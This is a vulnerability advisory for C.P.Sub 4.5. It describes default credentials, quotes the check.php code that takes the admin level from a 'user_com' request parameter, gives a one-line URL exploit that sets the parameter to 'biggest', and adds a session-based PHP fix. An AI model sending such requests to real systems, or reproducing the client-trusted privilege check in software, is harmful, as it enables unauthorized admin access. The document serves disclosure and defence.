C.P.Sub Multiple Default Credentials Vulnerability
Summary
Credit:
The information has been provided by Chako.
Details
Vulnerable Systems:
* C.P.Sub 4.5
By default, C.P.Sub installs with multiple unspecified default user credentials (username/password combination). These accounts allow remote attackers to trivially access the program or system and gain privileged access.
Improper Authentication:
Description:
C.P.Sub <= v4.5 uses the ‘user_com=’ parameter to determine whether the user has admin privileges.
An attacker can therefore simply change the value of the ‘user_com=’ parameter to gain admin privileges.
/check.php (LINE: 36-44)
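// The privilege level is read straight from the request (GET first, then POST)
if($_GET[user_com] != '')
{
    $user_com = $_GET[user_com];
}elseif($_POST[user_com] != '')
{
    $user_com = $_POST[user_com];
}
// 'biggest' is the admin level, so any client that sends it is treated as admin
if($user_com == 'biggest')
{
    // (excerpt ends here)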
Exploit:
change
http://Example_Target/info.php?cookie=yes&user_com=second
to
http://Example_Target/info.php?cookie=yes&user_com=biggest
Disclosure Timeline:
Disclosure Date: 2013-07-01
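Mitigation example (added here; not C.P.Sub code and not a vendor patch): the check.php logic shown above next to a version that takes the privilege level only from server-side session state set at login. The function names, session keys and the $users array are hypothetical, and 'second' is assumed to be a non-admin level.

```php
<?php
declare(strict_types=1);
// Added example: function names, session keys and $users are hypothetical.
const ROLES = ['second', 'biggest']; // levels named on the page; 'second' assumed non-admin

// The check.php pattern from the advisory: the client states its own privilege.
function legacy_is_admin(array $get, array $post): bool
{
    $user_com = ($get['user_com'] ?? '') !== '' ? $get['user_com'] : ($post['user_com'] ?? '');
    return $user_com == 'biggest';
}

// Verify the password, then bind the stored role to the server-side session.
function login(array $users, string $name, string $password, array &$session): bool
{
    $user = $users[$name] ?? null;
    if ($user === null || !password_verify($password, $user['hash'])) {
        return false;
    }
    if (!in_array($user['role'], ROLES, true)) {
        return false; // unknown role in the user store: refuse the login
    }
    // With a real PHP session, call session_regenerate_id(true) at this point.
    $session['user'] = $name;
    $session['user_com'] = $user['role'];
    return true;
}

// Privilege comes from the session only; $_GET and $_POST are never consulted.
function current_role(array $session): ?string
{
    $role = $session['user_com'] ?? null;
    return (is_string($role) && in_array($role, ROLES, true)) ? $role : null;
}

function is_admin(array $session): bool
{
    return current_role($session) === 'biggest';
}

// Constructed demo: a non-admin account whose request carries user_com=biggest.
$users = ['alice' => ['hash' => password_hash('constructed-pw', PASSWORD_DEFAULT), 'role' => 'second']];
$session = [];                        // stands in for $_SESSION
$request = ['user_com' => 'biggest']; // request data, fully client-controlled
login($users, 'alice', 'constructed-pw', $session);
var_dump(legacy_is_admin($request, []), is_admin($session));
```

In a deployment, $session is $_SESSION after session_start(), and any default accounts shipped with the install are removed or given new passwords before the application is exposed.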